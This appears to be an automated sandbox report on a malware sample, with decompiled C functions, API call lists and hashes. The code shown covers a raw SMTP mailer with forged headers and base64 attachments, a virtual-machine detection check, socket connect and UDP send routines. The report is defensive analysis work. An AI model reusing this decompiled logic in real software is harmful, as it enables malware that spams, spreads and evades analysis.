                                                                          • Associated: 00000001.00000002.280982620.0000000000431000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.281015199.0000000000435000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.281031045.0000000000436000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.281037174.0000000000437000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_smnss.jbxd
                                                                          Similarity
                                                                          • API ID: File$Pointer$Read
                                                                          • String ID:
                                                                          • API String ID: 2010065189-0
                                                                          • Opcode ID: 98bbd356c3167e2cab6cdd34103aca9027d91ebdbeeba2350e71e45c4cb0b634
                                                                          • Instruction ID: 2fc028183e425e45779f901a37d6f7d52457d7c17fe6e1465a33136023a7a73b
                                                                          • Opcode Fuzzy Hash: 98bbd356c3167e2cab6cdd34103aca9027d91ebdbeeba2350e71e45c4cb0b634
                                                                          • Instruction Fuzzy Hash: 69111FF04083049FD710AF15C9843AFBBF4EB84354F00C8AEE98867281D7798589CF96
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          C-Code - Quality: 58%
                                                                          			E00405434(signed int __eax, void* __ebx, signed int _a4, signed short _a8) {
                                                                          				void* _v8;
                                                                          				intOrPtr _v24;
                                                                          				signed int _v26;
                                                                          				char _v28;
                                                                          				intOrPtr _v40;
                                                                          				intOrPtr _v44;
                                                                          				intOrPtr _v48;
                                                                          				intOrPtr _v52;
                                                                          				intOrPtr _v56;
                                                                          				intOrPtr _v64;
                                                                          				intOrPtr _v68;
                                                                          				intOrPtr _v72;
                                                                          				intOrPtr _v76;
                                                                          				intOrPtr _v80;
                                                                          				signed int _v84;
                                                                          				signed int _t21;
                                                                          				intOrPtr _t23;
                                                                          				signed int _t24;
                                                                          				signed int _t26;
                                                                          				void* _t29;
                                                                          				intOrPtr* _t30;
                                                                          				void* _t31;
                                                                          				intOrPtr* _t32;
                                                                          
                                                                          				_t30 = _t29 - 0x34;
                                                                          				_v40 = 0;
                                                                          				_v44 = 0;
                                                                          				_v48 = 0;
                                                                          				_v52 = 6;
                                                                          				_v56 = 1;
                                                                          				 *_t30 = 2; // executed
                                                                          				L004086F0(); // executed
                                                                          				_t31 = _t30 - 0x18;
                                                                          				_t26 = __eax;
                                                                          				_t28 = 0xffffffff;
                                                                          				if(__eax != 0xffffffff) {
                                                                          					_t21 = _a8 & 0x0000ffff;
                                                                          					_v84 = _t21;
                                                                          					L004086F8();
                                                                          					_t32 = _t31 - 4;
                                                                          					_v26 = _t21;
                                                                          					_v28 = 2;
                                                                          					 *_t32 = _a4; // executed
                                                                          					_t23 = E004053C2(_a4, 0xffffffff); // executed
                                                                          					_v24 = _t23;
                                                                          					_v64 = 0;
                                                                          					_v68 = 0;
                                                                          					_v72 = 0;
                                                                          					_v76 = 0;
                                                                          					_v80 = 0x10;
                                                                          					_t24 =  &_v28;
                                                                          					_v84 = _t24;
                                                                          					 *_t32 = _t26; // executed
                                                                          					L00408700(); // executed
                                                                          					_t28 = 0xffffffff;
                                                                          					if(_t24 != 0xffffffff) {
                                                                          						_t28 = _t26;
                                                                          					}
                                                                          				}
                                                                          				return _t28;
                                                                          			}


























                                                                          0x00405438
                                                                          0x0040543b
                                                                          0x00405443
                                                                          0x0040544b
                                                                          0x00405453
                                                                          0x0040545b
                                                                          0x00405463
                                                                          0x0040546a
                                                                          0x0040546f
                                                                          0x00405472
                                                                          0x00405474
                                                                          0x0040547c
                                                                          0x0040547e
                                                                          0x00405482
                                                                          0x00405485
                                                                          0x0040548a
                                                                          0x0040548d
                                                                          0x00405491
                                                                          0x0040549a
                                                                          0x0040549d
                                                                          0x004054a2
                                                                          0x004054a5
                                                                          0x004054ad
                                                                          0x004054b5
                                                                          0x004054bd
                                                                          0x004054c5
                                                                          0x004054cd
                                                                          0x004054d0
                                                                          0x004054d4
                                                                          0x004054d7
                                                                          0x004054df
                                                                          0x004054e7
                                                                          0x004054e9
                                                                          0x004054e9
                                                                          0x004054e7
                                                                          0x004054f1

                                                                          APIs
                                                                          • WSASocketA.WS2_32 ref: 0040546A
                                                                          • htons.WS2_32 ref: 00405485
                                                                            • Part of subcall function 004053C2: gethostbyname.WS2_32(00000000), ref: 004053D7
                                                                            • Part of subcall function 004053C2: inet_addr.WS2_32 ref: 004053E8
                                                                            • Part of subcall function 004053C2: memcpy.MSVCRT ref: 00405423
                                                                          • WSAConnect.WS2_32 ref: 004054D7
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.280268095.0000000000401000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.280247027.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.280559030.0000000000419000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.280572210.000000000041C000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.280598300.0000000000420000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.280615823.0000000000423000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.280797442.0000000000425000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.280817023.0000000000429000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.280970732.000000000042D000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.280982620.0000000000431000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.281015199.0000000000435000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.281031045.0000000000436000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.281037174.0000000000437000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_smnss.jbxd
                                                                          Similarity
                                                                          • API ID: ConnectSocketgethostbynamehtonsinet_addrmemcpy
                                                                          • String ID:
                                                                          • API String ID: 627762279-0
                                                                          • Opcode ID: cbeef7b113f09878ddbc90929fe5aaae046d80e49792cd390fc9edf2445fe666
                                                                          • Instruction ID: 4ae3107c3b65c64df90930ed9eb0b1ead9faca9bbcd06d8d2a5bcce3cf5a65bf
                                                                          • Opcode Fuzzy Hash: cbeef7b113f09878ddbc90929fe5aaae046d80e49792cd390fc9edf2445fe666
                                                                          • Instruction Fuzzy Hash: ED1118B05047059BD700EF69C58935FBBF0AF44328F108A2DE4A89B3D2E7B9C5498B97
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.280268095.0000000000401000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.280247027.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.280559030.0000000000419000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.280572210.000000000041C000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.280598300.0000000000420000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.280615823.0000000000423000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.280797442.0000000000425000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.280817023.0000000000429000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.280970732.000000000042D000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.280982620.0000000000431000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.281015199.0000000000435000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.281031045.0000000000436000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.281037174.0000000000437000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_smnss.jbxd
                                                                          Similarity
                                                                          • API ID: gethostbynameinet_addrmemcpy
                                                                          • String ID:
                                                                          • API String ID: 1740921095-0
                                                                          • Opcode ID: fe788954808ae36a3766fbf6f3cc5b4fd8bb7ec2d21b63c4e00761cad23c0ede
                                                                          • Instruction ID: 533992feeedd80a0f3e016846fddd558e4e21ba974aaa263bb38accae91cd44b
                                                                          • Opcode Fuzzy Hash: fe788954808ae36a3766fbf6f3cc5b4fd8bb7ec2d21b63c4e00761cad23c0ede
                                                                          • Instruction Fuzzy Hash: 60017875904B049BDB00AFA9D18129FBBB4EF04360F00857EEC94A7380E7389644CB86
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.280268095.0000000000401000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.280247027.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.280559030.0000000000419000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.280572210.000000000041C000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.280598300.0000000000420000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.280615823.0000000000423000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.280797442.0000000000425000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.280817023.0000000000429000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.280970732.000000000042D000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.280982620.0000000000431000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.281015199.0000000000435000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.281031045.0000000000436000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.281037174.0000000000437000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_smnss.jbxd
                                                                          Similarity
                                                                          • API ID: fclosefopen
                                                                          • String ID:
                                                                          • API String ID: 1280645193-0
                                                                          • Opcode ID: c0597ab26c6aa1b78a6ebbb00da8a547106f8da08274bd1923c6da324a404cdd
                                                                          • Instruction ID: 620b73777646bea3160a61964eb414d400b49bbe5014070f778a9d056a582589
                                                                          • Opcode Fuzzy Hash: c0597ab26c6aa1b78a6ebbb00da8a547106f8da08274bd1923c6da324a404cdd
                                                                          • Instruction Fuzzy Hash: 69D05E74204300D7E7007F79988530A7AD49B80308F00883DA980EF3C6EA79D8448B45
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          C-Code - Quality: 23%
                                                                          			E00401280() {
                                                                          				void* _t4;
                                                                          				intOrPtr* _t5;
                                                                          				intOrPtr* _t8;
                                                                          
                                                                          				 *_t8 = 1;
                                                                          				 *0x41949c();
                                                                          				E00401150();
                                                                          				_t5 = _t8;
                                                                          				 *((intOrPtr*)(_t8 - 8)) = 2;
                                                                          				 *0x41949c(_t4); // executed
                                                                          				E00401150(); // executed
                                                                          				_push(_t5);
                                                                          				goto __ecx;
                                                                          			}






                                                                          0x00401286
                                                                          0x0040128d
                                                                          0x00401293
                                                                          0x004012a1
                                                                          0x004012a6
                                                                          0x004012ad
                                                                          0x004012b3
                                                                          0x004012c0
                                                                          0x004012ca

                                                                          APIs
                                                                          • __set_app_type.MSVCRT ref: 0040128D
                                                                            • Part of subcall function 00401150: SetUnhandledExceptionFilter.KERNEL32 ref: 0040115E
                                                                            • Part of subcall function 00401150: __getmainargs.MSVCRT ref: 0040119E
                                                                            • Part of subcall function 00401150: _setmode.MSVCRT ref: 004011D8
                                                                            • Part of subcall function 00401150: _setmode.MSVCRT ref: 004011FC
                                                                            • Part of subcall function 00401150: __p__fmode.MSVCRT ref: 00401210
                                                                            • Part of subcall function 00401150: __p__environ.MSVCRT ref: 0040122A
                                                                            • Part of subcall function 00401150: _cexit.MSVCRT ref: 0040124D
                                                                            • Part of subcall function 00401150: ExitProcess.KERNEL32 ref: 00401255
                                                                            • Part of subcall function 00401150: _setmode.MSVCRT ref: 0040126F
                                                                          • __set_app_type.MSVCRT ref: 004012AD
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.280268095.0000000000401000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.280247027.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.280559030.0000000000419000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.280572210.000000000041C000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.280598300.0000000000420000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.280615823.0000000000423000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.280797442.0000000000425000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.280817023.0000000000429000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.280970732.000000000042D000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.280982620.0000000000431000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.281015199.0000000000435000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.281031045.0000000000436000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.281037174.0000000000437000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_smnss.jbxd
                                                                          Similarity
                                                                          • API ID: _setmode$__set_app_type$ExceptionExitFilterProcessUnhandled__getmainargs__p__environ__p__fmode_cexit
                                                                          • String ID:
                                                                          • API String ID: 2043081007-0
                                                                          • Opcode ID: 36b1d3dea03947f55434b9ec7bd84f55484cfed7e86ffaa1a5bdde0d5196f56c
                                                                          • Instruction ID: 752eb1ab21b4c19d55682f3c7b2bcf3a34383202cb890f95c9a90ba33a14ec6c
                                                                          • Opcode Fuzzy Hash: 36b1d3dea03947f55434b9ec7bd84f55484cfed7e86ffaa1a5bdde0d5196f56c
                                                                          • Instruction Fuzzy Hash: 02D09B354142149BC7007BF5DC0A399BBA86B09301F41443CE6CD67261D6743C4947DA
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.280268095.0000000000401000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.280247027.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.280559030.0000000000419000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.280572210.000000000041C000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.280598300.0000000000420000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.280615823.0000000000423000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.280797442.0000000000425000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.280817023.0000000000429000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.280970732.000000000042D000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.280982620.0000000000431000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.281015199.0000000000435000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.281031045.0000000000436000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.281037174.0000000000437000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_smnss.jbxd
                                                                          Similarity
                                                                          • API ID: CountHeapProcessSleepTick$AllocateCurrentSocketinet_addrmemsetsendtosetsockopt
                                                                          • String ID:
                                                                          • API String ID: 3025670439-0
                                                                          • Opcode ID: aab9db7d1f6547efff39c5e7e4416d57ca9136db26d487827e21e78aeb388619
                                                                          • Instruction ID: c887a22924d357f2cc4e5641eb84b294b57a756f528ba2f64bcdc76ce2e57ac6
                                                                          • Opcode Fuzzy Hash: aab9db7d1f6547efff39c5e7e4416d57ca9136db26d487827e21e78aeb388619
                                                                          • Instruction Fuzzy Hash: EB5129B09043459BD700EFA8C18439EFBF1BF84314F108A3EE499AB785D7789459CB96
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.280268095.0000000000401000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.280247027.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.280559030.0000000000419000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.280572210.000000000041C000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.280598300.0000000000420000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.280615823.0000000000423000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.280797442.0000000000425000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.280817023.0000000000429000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.280970732.000000000042D000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.280982620.0000000000431000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.281015199.0000000000435000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.281031045.0000000000436000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.281037174.0000000000437000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_smnss.jbxd
                                                                          Similarity
                                                                          • API ID: strstr
                                                                          • String ID: qemu$vbox$virtual$vmware
                                                                          • API String ID: 1392478783-2646423876
                                                                          • Opcode ID: e80c964a466ab43288035c18f3b9686e1997324c0e45a20cd33772183577bb06
                                                                          • Instruction ID: b540962fa618101e36228a8a74583da539d79dad1ba2731ad5b1d3bf9ece319c
                                                                          • Opcode Fuzzy Hash: e80c964a466ab43288035c18f3b9686e1997324c0e45a20cd33772183577bb06
                                                                          • Instruction Fuzzy Hash: 3DF0A7F4800208CBDB109FA5D8813AF7BA8EB04718F10407ADA54BF7C0D3799D8487D9
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          C-Code - Quality: 93%
                                                                          			E0040619A(void* __edx, CHAR* _a4, intOrPtr _a8, intOrPtr _a12, CHAR* _a16, CHAR* _a20, CHAR* _a24, intOrPtr _a28, intOrPtr _a32) {
                                                                          				void* _v16;
                                                                          				intOrPtr _v40;
                                                                          				int _v42;
                                                                          				char _v44;
                                                                          				void _v1068;
                                                                          				char _v1132;
                                                                          				intOrPtr _v1136;
                                                                          				intOrPtr _v1140;
                                                                          				intOrPtr _v1144;
                                                                          				intOrPtr _v1148;
                                                                          				intOrPtr _v1152;
                                                                          				intOrPtr _v1156;
                                                                          				intOrPtr _v1160;
                                                                          				intOrPtr _v1164;
                                                                          				void _v1228;
                                                                          				struct _SYSTEMTIME _v1244;
                                                                          				int _v1248;
                                                                          				void* _v1252;
                                                                          				intOrPtr _v1256;
                                                                          				void* _v1260;
                                                                          				intOrPtr _v1264;
                                                                          				void* _v1268;
                                                                          				CHAR* _v1272;
                                                                          				CHAR* _v1276;
                                                                          				void* _v1280;
                                                                          				signed int _v1284;
                                                                          				signed int _v1288;
                                                                          				intOrPtr _v1292;
                                                                          				signed int _v1296;
                                                                          				char _v1300;
                                                                          				void* _v1304;
                                                                          				intOrPtr _v1308;
                                                                          				CHAR* _v1312;
                                                                          				char _v1316;
                                                                          				CHAR* _v1320;
                                                                          				CHAR* _v1324;
                                                                          				CHAR* _v1328;
                                                                          				void* __ebx;
                                                                          				int _t137;
                                                                          				int _t138;
                                                                          				char _t139;
                                                                          				char* _t140;
                                                                          				CHAR* _t166;
                                                                          				void* _t193;
                                                                          				CHAR* _t195;
                                                                          				CHAR* _t200;
                                                                          				CHAR* _t202;
                                                                          				void* _t203;
                                                                          				void* _t208;
                                                                          				void* _t209;
                                                                          				CHAR* _t215;
                                                                          				void* _t216;
                                                                          				void* _t217;
                                                                          				CHAR** _t222;
                                                                          				CHAR** _t226;
                                                                          
                                                                          				_t208 = __edx;
                                                                          				memset( &_v1068, 0, 0x400);
                                                                          				_t209 =  &_v1132;
                                                                          				asm("cld");
                                                                          				memset(_t209, 0, 0xc << 2);
                                                                          				 *((short*)(_t209 + 0xc)) = 0;
                                                                          				_v1164 = 0x412620;
                                                                          				_v1160 = 0x412624;
                                                                          				_v1156 = 0x412628;
                                                                          				_v1152 = 0x41262c;
                                                                          				_v1148 = 0x412630;
                                                                          				_v1144 = 0x412634;
                                                                          				_v1140 = 0x412638;
                                                                          				_v1136 = 0x41263c;
                                                                          				memcpy( &_v1228, 0x40d424, 0xd << 2);
                                                                          				GetSystemTime( &_v1244);
                                                                          				_v1276 = _v1244.wSecond & 0x0000ffff;
                                                                          				_v1280 = _v1244.wMinute & 0x0000ffff;
                                                                          				_v1284 = _v1244.wHour & 0x0000ffff;
                                                                          				_v1288 = _v1244.wYear & 0x0000ffff;
                                                                          				_v1292 =  *((intOrPtr*)(_t216 + (_v1244.wMonth & 0x0000ffff) * 4 - 0x4c8));
                                                                          				_v1296 = _v1244.wDay & 0x0000ffff;
                                                                          				_v1300 =  *((intOrPtr*)(_t216 + (_v1244.wDayOfWeek & 0x0000ffff) * 4 - 0x488));
                                                                          				_t137 = wsprintfA( &_v1132, "%s, %d %s %d %d:%d:%d GMT");
                                                                          				_v1292 = 6;
                                                                          				_v1296 = 1;
                                                                          				_v1300 = 2;
                                                                          				L00408708();
                                                                          				_t222 = _t217 - 0x50c + 0x18 - 0xfffffffffffffff8;
                                                                          				_t215 = _t137;
                                                                          				if(_t137 == 0xffffffff) {
                                                                          					L39:
                                                                          					_v1312 = _t215;
                                                                          					L004086C0();
                                                                          					_t138 = 0;
                                                                          				} else {
                                                                          					_v44 = 2;
                                                                          					_v1312 = 0x19;
                                                                          					L004086F8();
                                                                          					_v42 = _t137;
                                                                          					_t139 = _a4;
                                                                          					_v1316 = _t139;
                                                                          					L004086E8();
                                                                          					_t226 = _t222;
                                                                          					_v40 = _t139;
                                                                          					if(_t139 != 0xffffffff) {
                                                                          						L4:
                                                                          						_v1312 = 0x10;
                                                                          						_t140 =  &_v44;
                                                                          						_v1316 = _t140;
                                                                          						_v1320 = _t215;
                                                                          						L00408710();
                                                                          						_t222 = _t226 - 0xc;
                                                                          						if(_t140 == 0xffffffff) {
                                                                          							goto L39;
                                                                          						} else {
                                                                          							 *_t222 = _t215;
                                                                          							if(E004067E0(0) == 0) {
                                                                          								goto L39;
                                                                          							} else {
                                                                          								_v1324 = _a4;
                                                                          								_v1328 = "HELO %s\r\n";
                                                                          								_t200 =  &_v1068;
                                                                          								 *_t222 = _t200;
                                                                          								if(E00406788(wsprintfA(??, ??), _t215, _t200) == 0) {
                                                                          									goto L39;
                                                                          								} else {
                                                                          									_v1316 = _a8;
                                                                          									if(E00406788(wsprintfA(_t200, "MAIL FROM: <%s>\r\n"), _t215, _t200) == 0) {
                                                                          										goto L39;
                                                                          									} else {
                                                                          										_v1308 = _a12;
                                                                          										if(E00406788(wsprintfA(_t200, "RCPT TO: <%s>\r\n"), _t215, _t200) == 0 || E00406788(_t150, _t215, "DATA\r\n") == 0) {
                                                                          											goto L39;
                                                                          										} else {
                                                                          											_v1300 = _a8;
                                                                          											if(E00406746(wsprintfA(_t200, "FROM: <%s>\r\n"), _t200, _t215, _t200) == 0) {
                                                                          												goto L39;
                                                                          											} else {
                                                                          												_v1292 = _a12;
                                                                          												if(E00406746(wsprintfA(_t200, "TO: <%s>\r\n"), _t200, _t215, _t200) == 0) {
                                                                          													goto L39;
                                                                          												} else {
                                                                          													_v1284 =  &_v1132;
                                                                          													if(E00406746(wsprintfA(_t200, "Date: %s\r\n"), _t200, _t215, _t200) == 0 || E00406746(_t160, _t200, _t215, "MIME-Version: 1.0\r\n") == 0) {
                                                                          														goto L39;
                                                                          													} else {
                                                                          														_v1276 = _a16;
                                                                          														if(E00406746(wsprintfA(_t200, "Subject: %s\r\n"), _t200, _t215, _t200) == 0 || E00406746(_t164, _t200, _t215, "X-Mailer: Microsoft Outlook Express 6.00.2800.1106\r\n") == 0) {
                                                                          															goto L39;
                                                                          														} else {
                                                                          															_t166 = _a24;
                                                                          															_v1276 = _t166;
                                                                          															L0040C310();
                                                                          															_t222 = _t222 - 4;
                                                                          															if(_t166 == 0) {
                                                                          																if(E00406746(_t166, _t200, _t215, "Content-type: text/plain; charset=ISO-8859-1\r\n") == 0 || E00406746(_t167, _t200, _t215, "Content-Transfer-Encoding: 8bit\r\n") == 0) {
                                                                          																	goto L39;
                                                                          																} else {
                                                                          																	_v1272 = _a20;
                                                                          																	_v1276 = "\r\n%s\r\n";
                                                                          																	_v1280 =  &_v1068;
                                                                          																	if(E00406746(wsprintfA(??, ??),  &_v1068, _t215,  &_v1068) == 0) {
                                                                          																		goto L39;
                                                                          																	} else {
                                                                          																		goto L36;
                                                                          																	}
                                                                          																}
                                                                          															} else {
                                                                          																if(E00406746(_t166, _t200, _t215, "Content-type: Multipart/Mixed; boundary=xContext\r\n") == 0 || E00406746(_t174, _t200, _t215, "\r\n--xContext\r\n") == 0) {
                                                                          																	goto L39;
                                                                          																} else {
                                                                          																	if(_a32 == 0) {
                                                                          																		if(E00406746(_t175, _t200, _t215, "Content-type: text/plain; charset=ISO-8859-1\r\n") == 0) {
                                                                          																			goto L39;
                                                                          																		} else {
                                                                          																			goto L23;
                                                                          																		}
                                                                          																	} else {
                                                                          																		if(E00406746(_t175, _t200, _t215, "Content-type: text/plain; charset=Windows-1251\r\n") == 0) {
                                                                          																			goto L39;
                                                                          																		} else {
                                                                          																			L23:
                                                                          																			if(E00406746(_t176, _t200, _t215, "Content-Transfer-Encoding: 8bit\r\n") == 0) {
                                                                          																				goto L39;
                                                                          																			} else {
                                                                          																				_v1272 = _a20;
                                                                          																				_v1276 = "\r\n%s\r\n";
                                                                          																				_t202 =  &_v1068;
                                                                          																				_v1280 = _t202;
                                                                          																				if(E00406746(wsprintfA(??, ??), _t202, _t215, _t202) == 0 || E00406746(_t180, _t202, _t215, "\r\n--xContext\r\n") == 0) {
                                                                          																					goto L39;
                                                                          																				} else {
                                                                          																					_v1264 = _a28;
                                                                          																					if(E00406746(wsprintfA(_t202, "Content-type: Application/Octet-stream; name=\"%s\"; type:unknown\r\n"), _t202, _t215, _t202) == 0) {
                                                                          																						goto L39;
                                                                          																					} else {
                                                                          																						_v1256 = _a28;
                                                                          																						if(E00406746(wsprintfA(_t202, "Content-Disposition: attachment; filename=\"%s\"\r\n"), _t202, _t215, _t202) == 0 || E00406746(_t187, _t202, _t215, "Content-Transfer-Encoding: base64\r\n\r\n") == 0) {
                                                                          																							goto L39;
                                                                          																						} else {
                                                                          																							_v1248 = 0;
                                                                          																							_t203 = E004017F8(_t208, _a24,  &_v1248);
                                                                          																							if(E00406746(_t191, _t203, _t215, _t191) != 0) {
                                                                          																								_t193 = GlobalFree(_t203);
                                                                          																								_t222 = _t222 - 4;
                                                                          																								if(E00406746(_t193, _t203, _t215, "\r\n\r\n--xContext--\r\n") == 0) {
                                                                          																									goto L39;
                                                                          																								} else {
                                                                          																									L36:
                                                                          																									if(E00406788(_t171, _t215, "\r\n.\r\n") == 0 || E00406788(_t172, _t215, "QUIT\r\n") == 0) {
                                                                          																										goto L39;
                                                                          																									} else {
                                                                          																										_v1272 = _t215;
                                                                          																										L004086C0();
                                                                          																										_t138 = 1;
                                                                          																									}
                                                                          																								}
                                                                          																							} else {
                                                                          																								GlobalFree(_t203);
                                                                          																								_t222 = _t222 - 4;
                                                                          																								goto L39;
                                                                          																							}
                                                                          																						}
                                                                          																					}
                                                                          																				}
                                                                          																			}
                                                                          																		}
                                                                          																	}
                                                                          																}
                                                                          															}
                                                                          														}
                                                                          													}
                                                                          												}
                                                                          											}
                                                                          										}
                                                                          									}
                                                                          								}
                                                                          							}
                                                                          						}
                                                                          					} else {
                                                                          						_t195 = _a4;
